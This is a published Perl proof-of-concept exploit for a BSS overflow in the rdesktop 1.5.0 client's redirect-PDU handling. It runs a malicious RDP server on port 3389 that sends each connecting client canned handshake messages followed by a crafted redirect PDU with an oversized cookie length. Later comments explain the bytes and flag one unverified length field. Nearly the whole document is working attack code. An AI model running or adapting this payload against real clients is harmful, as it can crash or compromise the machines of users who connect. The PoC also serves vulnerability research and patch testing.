
# Title : rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC
# Published : 2008-05-11
# Author : Guido Landi


#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use warnings;
use IO::Socket;

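# Listening socket for the victim rdesktop client. This is a *malicious
# server* PoC: anything that connects to port 3389 is fed the overflow PDU,
# so bind it to a lab interface (optional first command-line argument)
# instead of the default 0.0.0.0, which exposes it on every interface.
my $bind_addr = @ARGV ? $ARGV[0] : '0.0.0.0';
my $sock = IO::Socket::INET->new(
    LocalAddr => $bind_addr,
    LocalPort => 3389,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "cannot listen on $bind_addr:3389: $@ ($!)";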

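# The malicious redirect PDU. The original listing lost the backslashes of
# its "\xNN" escapes; they are restored here so real octets are sent.
#
# The first four bytes read like a 03 00 + 16-bit big-endian length prefix
# (0x0147 = 327), yet only 103 bytes follow. That mismatch is kept exactly
# as in the original PoC; whether rdesktop's read loop tolerates it is not
# verified here -- TODO confirm before relying on this framing.
#
# The trigger is the 0xffffffff "len of g_redirect_cookie" field: per the
# title and the linked advisory, rdesktop 1.5.0 trusts it when filling the
# fixed-size g_redirect_cookie buffer in .bss. The 64 'A's are just filler.
my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" .
           "\x01\x00\x10\x00"                                             .
           "\xc5\x32"                                                     .
           "\x04\x75"         . # PDU TYPE == 0x4 == PDU_REDIRECT
           "\xb7\xda\xf8\x43"                                             .
           "\x01\x00\x00\x00"                                             .
           "\x01\x00\x00\x00"                                             .
           "\xff\xff\xff\xff" . # len of g_redirect_cookie (the trigger)
           ("\x41" x 64);       # g_redirect_cookie: 64 x 'A' filler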

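# Accept clients forever. The client's data is never parsed: each time a
# newline-terminated chunk arrives, the whole canned server side of the
# exchange (ONE .. SEVEN) plus the malicious redirect PDU is written back.
# Write failures are reported rather than silently ignored; the client
# socket is closed once the peer goes away so the next victim can connect.
while (my $client = $sock->accept()) {
    binmode $client;    # raw octets -- no newline or encoding translation
    while (defined(my $ignored = <$client>)) {
        print {$client} ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil
            or warn "write to client failed: $!";
    }
    close $client or warn "close: $!";
}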




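# First canned server message (11 bytes). Bytes 3-4 (0x00 0x0b) equal the
# message length, so the framing is self-consistent once the lost
# backslashes of the "\xNN" escapes are restored. The empty prototype of
# the original was dropped; callers already use ONE() with parentheses.
sub ONE {
    return "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00";
}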

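# Second canned server message (329 bytes). Bytes 3-4 (0x01 0x49 = 329)
# equal the message length, confirming the byte count after restoring the
# lost backslashes of the "\xNN" escapes. The payload contains the ASCII
# markers "McDn" and "RSA1"; what they denote is not verified here.
sub TWO {
    return
        "\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01" .
        "\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01" .
        "\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02" .
        "\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02" .
        "\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c" .
        "\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0" .
        "\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00" .
        "\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01" .
        "\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00" .
        "\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8" .
        "\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e" .
        "\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d" .
        "\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91" .
        "\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01" .
        "\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31" .
        "\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00" .
        "\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63" .
        "\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74" .
        "\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89" .
        "\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83" .
        "\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee" .
        "\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53" .
        "\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00" .
        "\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04" .
        "\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f" .
        "\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7" .
        "\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98" .
        "\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a" .
        "\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53" .
        "\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00";
}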

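# Third canned server message (11 bytes). Bytes 3-4 (0x00 0x0b) equal the
# message length; the lost backslashes of the "\xNN" escapes are restored.
sub THREE {
    return "\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04";
}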

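# Fourth canned server message (15 bytes). Bytes 3-4 (0x00 0x0f) equal the
# message length; the lost backslashes of the "\xNN" escapes are restored.
# Differs from FIVE and SIX only in the repeated trailing 16-bit value
# (0x03ed here).
sub FOUR {
    return "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed";
}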

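# Fifth canned server message (15 bytes). Bytes 3-4 (0x00 0x0f) equal the
# message length; the lost backslashes of the "\xNN" escapes are restored.
# Same shape as FOUR and SIX with trailing value 0x03eb.
sub FIVE {
    return "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb";
}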

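# Sixth canned server message (15 bytes). Bytes 3-4 (0x00 0x0f) equal the
# message length; the lost backslashes of the "\xNN" escapes are restored.
# Same shape as FOUR and FIVE with trailing value 0x03ec.
sub SIX {
    return "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec";
}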

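# Seventh canned server message (34 bytes). Bytes 3-4 (0x00 0x22 = 34)
# equal the message length; the lost backslashes of the "\xNN" escapes are
# restored. Split across lines only for readability.
sub SEVEN {
    return
        "\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10" .
        "\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00";
}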
